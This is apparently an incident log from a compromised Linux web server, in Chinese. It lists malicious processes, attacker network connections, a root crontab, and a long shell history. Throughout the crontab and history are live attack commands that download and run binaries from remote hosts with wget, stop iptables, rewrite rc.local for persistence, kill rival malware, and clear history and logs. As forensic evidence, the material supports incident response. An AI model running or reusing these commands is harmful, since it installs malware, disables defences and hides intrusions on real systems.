阅读更多
/etc/rc.local 被添加
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
网络连接
tcp 0 0 ?.?.?.?:50004 121.12.110.96:10991 ESTABLISHED 23984/./sksapd
tcp 0 0 ?.?.?.?:7029 112.90.22.197:10991 ESTABLISHED 23977/./skysapd
tcp 0 0 ?.?.?.?:49999 121.12.110.96:10991 ESTABLISHED 23952/./ksapd
进程
root 23952 1 23952 23952 99 21:16 ? 00:51:14 ./ksapd
root 23962 1 23962 23962 0 21:16 ? 00:00:02 ./kysapd
root 23970 1 23970 23970 0 21:16 ? 00:00:03 ./atdd
root 23977 1 23977 23977 99 21:16 ? 00:55:01 ./skysapd
root 23984 1 23984 23984 99 21:16 ? 00:52:43 ./sksapd
历史命令 history被清除
crontab 被修改
[root@web ~]# grep -v \# /var/spool/cron/root
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * cd /etc; rm -rf dir sksapd.*
*/1 * * * * cd /etc; rm -rf dir skysapd.*
*/99 * * * * cd /root > .bash_history
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/skysapd
*/99 * * * * killall -9 cupsdd
*/1 * * * * killall -9 node24
*/98 * * * * killall -9 ksapd
*/96 * * * * killall -9 kysapd
*/96 * * * * killall -9 atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/96 * * * * killall -9 sksapd
*/96 * * * * killall -9 skysapd
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * /etc/init.d/iptables stop
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/99 * * * * cd /etc;./ksapd
*/97 * * * * cd /etc;./kysapd
*/97 * * * * cd /etc;./atdd
*/69 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/97 * * * * cd /etc;./sksapd
*/97 * * * * cd /etc;./skysapd
*/79 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/89 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/99 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * cd /etc; rm -rf dir cupsdd.*
*/1 * * * * cd /etc; rm -rf dir kysapd.*
*/1 * * * * cd /etc; rm -rf dir ksapd.*
*/1 * * * * cd /etc; rm -rf dir atdd.*
*/1 * * * * killall -9 freeBSD
*/1 * * * * history -c
*/15 * * * * cd /var/log > secure
[root@web tmp]#
[root@web tmp]# cat /tmp/tttt
12 2014-01-20 18:56:48 root killall sshbin
13 2014-01-20 18:56:48 root killall xudp
14 2014-01-20 18:56:48 root killall xupd1
15 2014-01-20 18:56:48 root killall xudp2
16 2014-01-20 18:56:48 root killall xudp3
17 2014-01-20 18:56:48 root killall xudp4
18 2014-01-20 18:56:48 root killall xudp5
19 2014-01-20 18:56:48 root killall /etc/idmapd/idmapd.so.cp
20 2014-01-20 18:56:48 root killall idmapd.so.cp
21 2014-01-20 18:56:48 root killall .IptabLex
22 2014-01-20 18:56:48 root killall .IptabLes
23 2014-01-20 18:56:48 root killall linuxssh
24 2014-01-20 18:56:48 root killall strutsbin
25 2014-01-20 18:56:48 root killall 266189
26 2014-01-20 18:56:48 root killall auto.bin
27 2014-01-20 18:56:48 root rm -f -r /etc/idmapd/idmapd.so.cp
28 2014-01-20 18:56:48 root rm -f -r /tmp/linuxx
29 2014-01-20 18:56:48 root rm -f -r /tmp/ssh3
30 2014-01-20 18:56:48 root rm -f -r /tmp/sh4
31 2014-01-20 18:56:48 root rm -f -r /tmp/ssh6
32 2014-01-20 18:56:48 root rm -f -r /tmp/ssh-32
33 2014-01-20 18:56:48 root rm -f -r /tmp/ssh-64
34 2014-01-20 18:56:48 root rm -f -r /tmp/ssh-c4
35 2014-01-20 18:56:48 root rm -f -r /tmp/drmc
36 2014-01-20 18:56:48 root rm -f -r /tmp/tmpof
37 2014-01-20 18:56:48 root rm -f -r /tmp/1471
38 2014-01-20 18:56:48 root rm -f -r /tmp/1417
39 2014-01-20 18:56:48 root rm -f -r /tmp/v432
40 2014-01-20 18:56:48 root rm -f -r /tmp/v532
41 2014-01-20 18:56:48 root rm -f -r /tmp/29881
42 2014-01-20 18:56:48 root rm -f -r /tmp/10993
43 2014-01-20 18:56:48 root rm -f -r /tmp/behsdf
44 2014-01-20 18:56:48 root rm -f -r /tmp/helen
45 2014-01-20 18:56:48 root rm -f -r /tmp/lampp
46 2014-01-20 18:56:48 root rm -f -r /tmp/Umi34Ber
47 2014-01-20 18:56:48 root rm -f -r /tmp/mysql.sock
48 2014-01-20 18:56:48 root rm -f -r /tmp/266189
49 2014-01-20 18:56:48 root rm -f -r /etc/x1
50 2014-01-20 18:56:48 root rm -f -r /etc/xxx
51 2014-01-20 18:56:48 root rm -f -r /etc/dos32
52 2014-01-20 18:56:48 root rm -f -r /etc/dos64
53 2014-01-20 18:56:48 root rm -f -r /etc/007
54 2014-01-20 18:56:48 root rm -f -r /etc/t32
55 2014-01-20 18:56:48 root rm -f -r /etc/lq64
56 2014-01-20 18:56:48 root rm -f -r /etc/t64
57 2014-01-20 18:56:48 root rm -f -r /etc/lq32
58 2014-01-20 18:56:48 root rm -f -r /etc/java.132.8_11
59 2014-01-20 18:56:48 root rm -f -r /etc/idmapd/apd.so.cp
60 2014-01-20 18:56:48 root rm -f -r /tmp/sshbin
61 2014-01-20 18:56:48 root rm -f -r /tmp/xudp
62 2014-01-20 18:56:48 root rm -f -r /tmp/xupd1
63 2014-01-20 18:56:48 root rm -f -r /tmp/xudp2
64 2014-01-20 18:56:48 root rm -f -r /tmp/xudp3
65 2014-01-20 18:56:48 root rm -f -r /tmp/xudp4
66 2014-01-20 18:56:48 root rm -f -r /tmp/xudp5
67 2014-01-20 18:56:48 root rm -f -r /tmp/java.2.15.22_20
68 2014-01-20 18:56:48 root rm -f -r /tmp/linuxssh
69 2014-01-20 18:56:48 root rm -f -r /tmp/strutsbin
70 2014-01-20 18:56:48 root rm -f -r /tmp/266189
71 2014-01-20 18:56:48 root rm -f -r etc/java.13.2.8_11
72 2014-01-20 18:56:48 root rm -f -r /etc/auto.bin
73 2014-01-20 18:56:48 root find /etc/ -name "*.service2" -exec rm {} \;
74 2014-01-20 18:56:48 root killall java-2013
75 2014-01-20 18:56:48 root killall wins
76 2014-01-20 18:56:48 root rm -f -r /etc/wins
77 2014-01-20 18:56:48 root rm -f -r /etc/java-2013
78 2014-01-20 18:56:48 root rm -f -r /etc/java-2013/java-2013
79 2014-01-20 18:56:48 root mkdir /etc/wins
80 2014-01-20 18:56:48 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
81 2014-01-20 18:56:49 root chmod 0755 /etc/wins/wins
82 2014-01-20 18:56:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
83 2014-01-20 18:56:49 root rm -f -r /etc/rc.local
84 2014-01-20 18:56:49 root rm -r -f /etc/rc.d/rc.local
85 2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
86 2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.local
87 2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
88 2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
89 2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
90 2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
91 2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
92 2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
93 2014-01-20 18:56:49 root rm -f -r 2618
94 2014-01-20 18:56:49 root rm -r -f TS269
95 2014-01-20 18:56:49 root exit
96 2014-01-20 18:44:53 root ps -ef |more
97 2014-01-20 18:45:44 root history |more
98 2014-01-20 18:53:10 root passwd
99 2014-01-20 18:58:15 root exit
100 2014-01-20 19:14:16 root passwd
101 2014-01-20 19:15:40 root exit
102 2014-01-20 19:18:07 root top
103 2014-01-20 19:19:03 root ps -ef |more
104 2014-01-20 19:19:47 root lsof -p 23656
105 2014-01-20 19:19:59 root lsof -p 23656
106 2014-01-20 19:20:03 root ps -ef |more
107 2014-01-20 19:21:25 root cd /etc/wins/wins
108 2014-01-20 19:21:31 root cd /etc/wins
109 2014-01-20 19:21:47 root cd /etc/wins
110 2014-01-20 19:21:58 root lll -a /
111 2014-01-20 19:22:03 root ll -a /
112 2014-01-20 19:22:14 root ll -a /boot/
113 2014-01-20 19:23:00 root cd /etc/liunx
114 2014-01-20 19:23:13 root cd /etc/idmapd
115 2014-01-20 19:23:15 root ls\
116 2014-01-20 19:23:19 root ls
117 2014-01-20 19:23:29 root ll -a
118 2014-01-20 19:23:43 root rm .idmapd_open
119 2014-01-20 19:23:53 root ll -a
120 2014-01-20 19:26:12 root cd /etc/rc.local
121 2014-01-20 19:26:21 root cd /etc/rc.local
122 2014-01-20 19:26:43 root cd /etc/rc.d/rc.local
123 2014-01-20 19:26:53 root ps -ef |more
124 2014-01-20 19:28:49 root cd /etc/wins
125 2014-01-20 19:29:02 root ll -a /wins
126 2014-01-20 19:29:11 root ll -a /etc/wins
127 2014-01-20 19:29:20 root pwd
128 2014-01-20 19:29:27 root ll -a /etc/
129 2014-01-20 19:29:34 root ll -a /etc/ |more
130 2014-01-20 19:35:12 root ll -a /etc/
131 2014-01-20 19:35:20 root ll -a /etc/ |more
132 2014-01-20 19:35:36 root ps -ef|more
133 2014-01-20 19:36:17 root history
134 2014-01-20 19:36:23 root history |more
135 2014-01-20 19:40:44 root cd /etc/java-2013
136 2014-01-20 19:40:53 root ll -a /tmp
137 2014-01-20 19:41:17 root ll -a /tmp
138 2014-01-20 19:41:21 root ll -a /tmp
139 2014-01-20 19:45:35 root cat /root/killback.sh
140 2014-01-20 19:45:50 root ll -a /tmp
141 2014-01-20 19:46:04 root rm java.pl
142 2014-01-20 19:46:14 root rm -r java.pl
143 2014-01-20 19:46:23 root ll -a /tmp
144 2014-01-20 19:46:35 root rm -r -f java.pl
145 2014-01-20 19:46:37 root ll -a /tmp
146 2014-01-20 19:46:41 root ll -a /tmp
147 2014-01-20 19:46:44 root ll -a /tmp
148 2014-01-20 19:46:56 root rm -r -f java.pl
149 2014-01-20 19:46:58 root ll -a /tmp
150 2014-01-20 19:48:00 root exit
151 2014-01-20 19:18:36 root top
152 2014-01-20 19:18:43 root ps -efjH
153 2014-01-20 19:18:59 root cd /etc/
154 2014-01-20 19:19:03 root rm -rf wins/
155 2014-01-20 19:19:13 root kill 23656 23656
156 2014-01-20 19:19:18 root ps -efjH
157 2014-01-20 19:19:47 root netstat -nltp
158 2014-01-20 19:21:13 root netstat -natp|grep EST|grep ssh
159 2014-01-20 19:21:22 root history|grep netsta
160 2014-01-20 19:21:28 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
161 2014-01-20 19:21:30 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
162 2014-01-20 19:28:33 root cd /opt/apache-tomcat-6.0.26/webapps/
163 2014-01-20 19:28:34 root ls
164 2014-01-20 19:28:35 root cd ROOT/
165 2014-01-20 19:28:37 root git status
166 2014-01-20 19:57:05 root ll /etc/wi
167 2014-01-20 19:57:07 root ll /etc/wi
168 2014-01-20 20:08:03 root ps -efjH
169 2014-01-20 20:08:14 root ps -efjH
170 2014-01-20 20:08:16 root ps -efjH
171 2014-01-20 20:08:17 root ps -efjH
172 2014-01-20 21:25:27 root top
173 2014-01-20 21:26:39 root top -d 30
174 2014-01-20 21:27:39 root /etc/init.d/iptables stop
175 2014-01-20 21:27:39 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
176 2014-01-20 21:27:39 root chmod 0775 /usr/bin/nohup
177 2014-01-20 21:27:39 root chmod 0775 /usr/bin/killall
178 2014-01-20 21:27:39 root killall lixtest
179 2014-01-20 21:27:39 root killall linuxx
180 2014-01-20 21:27:39 root killall ssh3
181 2014-01-20 21:27:39 root killall ssh4
182 2014-01-20 21:27:39 root killall ssh6
183 2014-01-20 21:27:39 root killall ssh-32
184 2014-01-20 21:27:39 root killall ssh-64
185 2014-01-20 21:27:39 root killall ssh-c4
186 2014-01-20 21:27:39 root killall java.13.2.8_11
187 2014-01-20 21:27:39 root killall drmc
188 2014-01-20 21:27:39 root killall tmpof
189 2014-01-20 21:27:39 root killall 1471
190 2014-01-20 21:27:39 root killall 1417
191 2014-01-20 21:27:39 root killall v432
192 2014-01-20 21:27:39 root killall v532
193 2014-01-20 21:27:39 root killall 29881
194 2014-01-20 21:27:39 root killall 10993
195 2014-01-20 21:27:39 root killall behsdf
196 2014-01-20 21:27:39 root killall helen
197 2014-01-20 21:27:39 root killall lampp
198 2014-01-20 21:27:39 root killall Umi34Ber
199 2014-01-20 21:27:39 root killall mysql.sock
200 2014-01-20 21:27:39 root killall sshd
201 2014-01-20 21:27:39 root killall xxx
202 2014-01-20 21:27:39 root killall dos32
203 2014-01-20 21:27:39 root killall dos64
204 2014-01-20 21:27:39 root killall 007
205 2014-01-20 21:27:39 root killall t32
206 2014-01-20 21:27:39 root killall lq64
207 2014-01-20 21:27:39 root killall t64
208 2014-01-20 21:27:39 root killall lq32
209 2014-01-20 21:27:40 root killall java.132.8_11
210 2014-01-20 21:27:40 root killall 261180
211 2014-01-20 21:27:40 root killall sshbin
212 2014-01-20 21:27:40 root killall xudp
213 2014-01-20 21:27:40 root killall xupd1
214 2014-01-20 21:27:40 root killall xudp2
215 2014-01-20 21:27:40 root killall xudp3
216 2014-01-20 21:27:40 root killall xudp4
217 2014-01-20 21:27:40 root killall xudp5
218 2014-01-20 21:27:40 root killall /etc/idmapd/idmapd.so.cp
219 2014-01-20 21:27:40 root killall idmapd.so.cp
220 2014-01-20 21:27:40 root killall .IptabLex
221 2014-01-20 21:27:40 root killall .IptabLes
222 2014-01-20 21:27:40 root killall linuxssh
223 2014-01-20 21:27:40 root killall strutsbin
224 2014-01-20 21:27:40 root killall 266189
225 2014-01-20 21:27:40 root killall auto.bin
226 2014-01-20 21:27:40 root rm -f -r /etc/idmapd/idmapd.so.cp
227 2014-01-20 21:27:40 root rm -f -r /tmp/linuxx
228 2014-01-20 21:27:40 root rm -f -r /tmp/ssh3
229 2014-01-20 21:27:40 root rm -f -r /tmp/sh4
230 2014-01-20 21:27:40 root rm -f -r /tmp/ssh6
231 2014-01-20 21:27:40 root rm -f -r /tmp/ssh-32
232 2014-01-20 21:27:40 root rm -f -r /tmp/ssh-64
233 2014-01-20 21:27:40 root rm -f -r /tmp/ssh-c4
234 2014-01-20 21:27:40 root rm -f -r /tmp/drmc
235 2014-01-20 21:27:40 root rm -f -r /tmp/tmpof
236 2014-01-20 21:27:40 root rm -f -r /tmp/1471
237 2014-01-20 21:27:40 root rm -f -r /tmp/1417
238 2014-01-20 21:27:40 root rm -f -r /tmp/v432
239 2014-01-20 21:27:40 root rm -f -r /tmp/v532
240 2014-01-20 21:27:40 root rm -f -r /tmp/29881
241 2014-01-20 21:27:40 root rm -f -r /tmp/10993
242 2014-01-20 21:27:40 root rm -f -r /tmp/behsdf
243 2014-01-20 21:27:40 root rm -f -r /tmp/helen
244 2014-01-20 21:27:40 root rm -f -r /tmp/lampp
245 2014-01-20 21:27:40 root rm -f -r /tmp/Umi34Ber
246 2014-01-20 21:27:40 root rm -f -r /tmp/mysql.sock
247 2014-01-20 21:27:40 root rm -f -r /tmp/266189
248 2014-01-20 21:27:40 root rm -f -r /etc/x1
249 2014-01-20 21:27:40 root rm -f -r /etc/xxx
250 2014-01-20 21:27:40 root rm -f -r /etc/dos32
251 2014-01-20 21:27:40 root rm -f -r /etc/dos64
252 2014-01-20 21:27:40 root rm -f -r /etc/007
253 2014-01-20 21:27:40 root rm -f -r /etc/t32
254 2014-01-20 21:27:40 root rm -f -r /etc/lq64
255 2014-01-20 21:27:40 root rm -f -r /etc/t64
256 2014-01-20 21:27:40 root rm -f -r /etc/lq32
257 2014-01-20 21:27:40 root rm -f -r /etc/java.132.8_11
258 2014-01-20 21:27:40 root rm -f -r /etc/idmapd/apd.so.cp
259 2014-01-20 21:27:40 root rm -f -r /tmp/sshbin
260 2014-01-20 21:27:40 root rm -f -r /tmp/xudp
261 2014-01-20 21:27:40 root rm -f -r /tmp/xupd1
262 2014-01-20 21:27:40 root rm -f -r /tmp/xudp2
263 2014-01-20 21:27:40 root rm -f -r /tmp/xudp3
264 2014-01-20 21:27:40 root rm -f -r /tmp/xudp4
265 2014-01-20 21:27:40 root rm -f -r /tmp/xudp5
266 2014-01-20 21:27:40 root rm -f -r /tmp/java.2.15.22_20
267 2014-01-20 21:27:40 root rm -f -r /tmp/linuxssh
268 2014-01-20 21:27:40 root rm -f -r /tmp/strutsbin
269 2014-01-20 21:27:40 root rm -f -r /tmp/266189
270 2014-01-20 21:27:40 root rm -f -r etc/java.13.2.8_11
271 2014-01-20 21:27:40 root rm -f -r /etc/auto.bin
272 2014-01-20 21:27:40 root find /etc/ -name "*.service2" -exec rm {} \;
273 2014-01-20 21:27:40 root killall java-2013
274 2014-01-20 21:27:40 root killall wins
275 2014-01-20 21:27:40 root rm -f -r /etc/wins
276 2014-01-20 21:27:40 root rm -f -r /etc/java-2013
277 2014-01-20 21:27:40 root rm -f -r /etc/java-2013/java-2013
278 2014-01-20 21:27:40 root mkdir /etc/wins
279 2014-01-20 21:27:40 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
280 2014-01-20 21:27:41 root chmod 0755 /etc/wins/wins
281 2014-01-20 21:27:41 root nohup /etc/wins/wins > /dev/null 2>&1 &
282 2014-01-20 21:27:41 root rm -f -r /etc/rc.local
283 2014-01-20 21:27:41 root rm -r -f /etc/rc.d/rc.local
284 2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.local
285 2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.local
286 2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
287 2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
288 2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
289 2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.d/rc.local
290 2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
291 2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
292 2014-01-20 21:27:41 root rm -f -r 2618
293 2014-01-20 21:27:41 root rm -r -f TS269
294 2014-01-20 21:27:41 root exit
295 2014-01-20 21:29:46 root /etc/init.d/iptables stop
296 2014-01-20 21:29:46 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
297 2014-01-20 21:29:46 root chmod 0775 /usr/bin/nohup
298 2014-01-20 21:29:46 root chmod 0775 /usr/bin/killall
299 2014-01-20 21:29:46 root killall lixtest
300 2014-01-20 21:29:46 root killall linuxx
301 2014-01-20 21:29:46 root killall ssh3
302 2014-01-20 21:29:46 root killall ssh4
303 2014-01-20 21:29:46 root killall ssh6
304 2014-01-20 21:29:46 root killall ssh-32
305 2014-01-20 21:29:46 root killall ssh-64
306 2014-01-20 21:29:46 root killall ssh-c4
307 2014-01-20 21:29:46 root killall java.13.2.8_11
308 2014-01-20 21:29:46 root killall drmc
309 2014-01-20 21:29:46 root killall tmpof
310 2014-01-20 21:29:46 root killall 1471
311 2014-01-20 21:29:46 root killall 1417
312 2014-01-20 21:29:46 root killall v432
313 2014-01-20 21:29:46 root killall v532
314 2014-01-20 21:29:46 root killall 29881
315 2014-01-20 21:29:46 root killall 10993
316 2014-01-20 21:29:46 root killall behsdf
317 2014-01-20 21:29:46 root killall helen
318 2014-01-20 21:29:46 root killall lampp
319 2014-01-20 21:29:46 root killall Umi34Ber
320 2014-01-20 21:29:46 root killall mysql.sock
321 2014-01-20 21:29:46 root killall sshd
322 2014-01-20 21:29:46 root killall xxx
323 2014-01-20 21:29:46 root killall dos32
324 2014-01-20 21:29:46 root killall dos64
325 2014-01-20 21:29:46 root killall 007
326 2014-01-20 21:29:46 root killall t32
327 2014-01-20 21:29:46 root killall lq64
328 2014-01-20 21:29:46 root killall t64
329 2014-01-20 21:29:46 root killall lq32
330 2014-01-20 21:29:46 root killall java.132.8_11
331 2014-01-20 21:29:46 root killall 261180
332 2014-01-20 21:29:46 root killall sshbin
333 2014-01-20 21:29:46 root killall xudp
334 2014-01-20 21:29:46 root killall xupd1
335 2014-01-20 21:29:46 root killall xudp2
336 2014-01-20 21:29:46 root killall xudp3
337 2014-01-20 21:29:46 root killall xudp4
338 2014-01-20 21:29:46 root killall xudp5
339 2014-01-20 21:29:46 root killall /etc/idmapd/idmapd.so.cp
340 2014-01-20 21:29:46 root killall idmapd.so.cp
341 2014-01-20 21:29:46 root killall .IptabLex
342 2014-01-20 21:29:46 root killall .IptabLes
343 2014-01-20 21:29:46 root killall linuxssh
344 2014-01-20 21:29:46 root killall strutsbin
345 2014-01-20 21:29:46 root killall 266189
346 2014-01-20 21:29:46 root killall auto.bin
347 2014-01-20 21:29:46 root rm -f -r /etc/idmapd/idmapd.so.cp
348 2014-01-20 21:29:46 root rm -f -r /tmp/linuxx
349 2014-01-20 21:29:46 root rm -f -r /tmp/ssh3
350 2014-01-20 21:29:46 root rm -f -r /tmp/sh4
351 2014-01-20 21:29:46 root rm -f -r /tmp/ssh6
352 2014-01-20 21:29:46 root rm -f -r /tmp/ssh-32
353 2014-01-20 21:29:46 root rm -f -r /tmp/ssh-64
354 2014-01-20 21:29:46 root rm -f -r /tmp/ssh-c4
355 2014-01-20 21:29:46 root rm -f -r /tmp/drmc
356 2014-01-20 21:29:46 root rm -f -r /tmp/tmpof
357 2014-01-20 21:29:46 root rm -f -r /tmp/1471
358 2014-01-20 21:29:46 root rm -f -r /tmp/1417
359 2014-01-20 21:29:46 root rm -f -r /tmp/v432
360 2014-01-20 21:29:46 root rm -f -r /tmp/v532
361 2014-01-20 21:29:46 root rm -f -r /tmp/29881
362 2014-01-20 21:29:46 root rm -f -r /tmp/10993
363 2014-01-20 21:29:46 root rm -f -r /tmp/behsdf
364 2014-01-20 21:29:46 root rm -f -r /tmp/helen
365 2014-01-20 21:29:46 root rm -f -r /tmp/lampp
366 2014-01-20 21:29:46 root rm -f -r /tmp/Umi34Ber
367 2014-01-20 21:29:46 root rm -f -r /tmp/mysql.sock
368 2014-01-20 21:29:46 root rm -f -r /tmp/266189
369 2014-01-20 21:29:46 root rm -f -r /etc/x1
370 2014-01-20 21:29:46 root rm -f -r /etc/xxx
371 2014-01-20 21:29:46 root rm -f -r /etc/dos32
372 2014-01-20 21:29:46 root rm -f -r /etc/dos64
373 2014-01-20 21:29:46 root rm -f -r /etc/007
374 2014-01-20 21:29:46 root rm -f -r /etc/t32
375 2014-01-20 21:29:46 root rm -f -r /etc/lq64
376 2014-01-20 21:29:46 root rm -f -r /etc/t64
377 2014-01-20 21:29:46 root rm -f -r /etc/lq32
378 2014-01-20 21:29:46 root rm -f -r /etc/java.132.8_11
379 2014-01-20 21:29:46 root rm -f -r /etc/idmapd/apd.so.cp
380 2014-01-20 21:29:46 root rm -f -r /tmp/sshbin
381 2014-01-20 21:29:46 root rm -f -r /tmp/xudp
382 2014-01-20 21:29:46 root rm -f -r /tmp/xupd1
383 2014-01-20 21:29:46 root rm -f -r /tmp/xudp2
384 2014-01-20 21:29:46 root rm -f -r /tmp/xudp3
385 2014-01-20 21:29:46 root rm -f -r /tmp/xudp4
386 2014-01-20 21:29:46 root rm -f -r /tmp/xudp5
387 2014-01-20 21:29:46 root rm -f -r /tmp/java.2.15.22_20
388 2014-01-20 21:29:46 root rm -f -r /tmp/linuxssh
389 2014-01-20 21:29:46 root rm -f -r /tmp/strutsbin
390 2014-01-20 21:29:46 root rm -f -r /tmp/266189
391 2014-01-20 21:29:46 root rm -f -r etc/java.13.2.8_11
392 2014-01-20 21:29:46 root rm -f -r /etc/auto.bin
393 2014-01-20 21:29:46 root find /etc/ -name "*.service2" -exec rm {} \;
394 2014-01-20 21:29:46 root killall java-2013
395 2014-01-20 21:29:46 root killall wins
396 2014-01-20 21:29:47 root rm -f -r /etc/wins
397 2014-01-20 21:29:47 root rm -f -r /etc/java-2013
398 2014-01-20 21:29:47 root rm -f -r /etc/java-2013/java-2013
399 2014-01-20 21:29:47 root mkdir /etc/wins
400 2014-01-20 21:29:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
401 2014-01-20 21:29:48 root chmod 0755 /etc/wins/wins
402 2014-01-20 21:29:48 root nohup /etc/wins/wins > /dev/null 2>&1 &
403 2014-01-20 21:29:48 root rm -f -r /etc/rc.local
404 2014-01-20 21:29:48 root rm -r -f /etc/rc.d/rc.local
405 2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.local
406 2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.local
407 2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
408 2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
409 2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
410 2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.d/rc.local
411 2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
412 2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
413 2014-01-20 21:29:48 root rm -f -r 2618
414 2014-01-20 21:29:48 root rm -r -f TS269
415 2014-01-20 21:29:48 root exit
416 2014-01-20 21:37:20 root ls
417 2014-01-20 21:37:30 root ps -ef |more
418 2014-01-20 21:38:17 root ps -ef |more
419 2014-01-20 21:38:59 root ps -ef |more
420 2014-01-20 21:39:54 root top
421 2014-01-20 21:40:23 root cd /etc/wins
422 2014-01-20 21:40:24 root ls
423 2014-01-20 21:40:31 root ll -a ./
424 2014-01-20 21:40:47 root rm -r -f /etc/wins
425 2014-01-20 21:40:59 root ll -a /
426 2014-01-20 21:41:10 root ll -a /boot/
427 2014-01-20 21:41:50 root crontab -l
428 2014-01-20 21:45:00 root crontab -l
429 2014-01-20 21:45:05 root /etc/init.d/iptables stop
430 2014-01-20 21:45:05 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
431 2014-01-20 21:45:05 root chmod 0775 /usr/bin/nohup
432 2014-01-20 21:45:05 root chmod 0775 /usr/bin/killall
433 2014-01-20 21:45:05 root killall lixtest
434 2014-01-20 21:45:05 root killall linuxx
435 2014-01-20 21:45:05 root killall ssh3
436 2014-01-20 21:45:05 root killall ssh4
437 2014-01-20 21:45:05 root killall ssh6
438 2014-01-20 21:45:05 root killall ssh-32
439 2014-01-20 21:45:05 root killall ssh-64
440 2014-01-20 21:45:05 root killall ssh-c4
441 2014-01-20 21:45:05 root killall java.13.2.8_11
442 2014-01-20 21:45:05 root killall drmc
443 2014-01-20 21:45:05 root killall tmpof
444 2014-01-20 21:45:05 root killall 1471
445 2014-01-20 21:45:05 root killall 1417
446 2014-01-20 21:45:05 root killall v432
447 2014-01-20 21:45:05 root killall v532
448 2014-01-20 21:45:05 root killall 29881
449 2014-01-20 21:45:06 root killall 10993
450 2014-01-20 21:45:06 root killall behsdf
451 2014-01-20 21:45:06 root killall helen
452 2014-01-20 21:45:06 root killall lampp
453 2014-01-20 21:45:06 root killall Umi34Ber
454 2014-01-20 21:45:06 root killall mysql.sock
455 2014-01-20 21:45:06 root killall sshd
456 2014-01-20 21:45:06 root killall xxx
457 2014-01-20 21:45:06 root killall dos32
458 2014-01-20 21:45:06 root killall dos64
459 2014-01-20 21:45:06 root killall 007
460 2014-01-20 21:45:06 root killall t32
461 2014-01-20 21:45:06 root killall lq64
462 2014-01-20 21:45:06 root killall t64
463 2014-01-20 21:45:06 root killall lq32
464 2014-01-20 21:45:06 root killall java.132.8_11
465 2014-01-20 21:45:06 root killall 261180
466 2014-01-20 21:45:06 root killall sshbin
467 2014-01-20 21:45:06 root killall xudp
468 2014-01-20 21:45:06 root killall xupd1
469 2014-01-20 21:45:06 root killall xudp2
470 2014-01-20 21:45:06 root killall xudp3
471 2014-01-20 21:45:06 root killall xudp4
472 2014-01-20 21:45:06 root killall xudp5
473 2014-01-20 21:45:06 root killall /etc/idmapd/idmapd.so.cp
474 2014-01-20 21:45:06 root killall idmapd.so.cp
475 2014-01-20 21:45:06 root killall .IptabLex
476 2014-01-20 21:45:06 root killall .IptabLes
477 2014-01-20 21:45:06 root killall linuxssh
478 2014-01-20 21:45:06 root killall strutsbin
479 2014-01-20 21:45:06 root killall 266189
480 2014-01-20 21:45:06 root killall auto.bin
481 2014-01-20 21:45:06 root rm -f -r /etc/idmapd/idmapd.so.cp
482 2014-01-20 21:45:06 root rm -f -r /tmp/linuxx
483 2014-01-20 21:45:06 root rm -f -r /tmp/ssh3
484 2014-01-20 21:45:06 root rm -f -r /tmp/sh4
485 2014-01-20 21:45:06 root rm -f -r /tmp/ssh6
486 2014-01-20 21:45:06 root rm -f -r /tmp/ssh-32
487 2014-01-20 21:45:06 root rm -f -r /tmp/ssh-64
488 2014-01-20 21:45:06 root rm -f -r /tmp/ssh-c4
489 2014-01-20 21:45:06 root rm -f -r /tmp/drmc
